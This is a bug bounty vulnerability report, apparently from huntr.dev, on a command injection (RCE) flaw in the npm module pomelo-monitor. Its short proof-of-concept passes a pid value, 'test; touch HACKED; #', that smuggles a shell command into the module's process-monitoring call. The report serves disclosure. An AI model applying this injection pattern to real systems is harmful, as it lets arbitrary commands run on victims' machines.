// poc.js
var monitor = require('pomelo-monitor');
var param = {pid: 'test; touch HACKED; #', serverId: 'node-1'};
monitor.psmonitor.getPsInfo(param, function(err, data) {});
Check there aren't files called HACKED
Execute the following commands in another terminal:
npm i pomelo-monitor # Install affected module
node poc.js # Run the PoC
Recheck the files: now HACKED has been created
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded :moneybag:? Go to https://huntr.dev/
This issue has been generated on-behalf of Mik317 (https://app.huntr.dev/users/Mik317)
Details
I would like to report a
RCE
issue in thepomelo-monitor
module. It allows to executearbitrary commands remotely inside the victim's PC
Vulnerability Description
The issue occurs because a
user input
is formatted inside acommand
that will be executed without any check. The issue arises here: https://github.com/halfblood369/monitor/blob/master/lib/processMonitor.js#L26Steps To Reproduce
HACKED
HACKED
has been createdBug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded :moneybag:? Go to https://huntr.dev/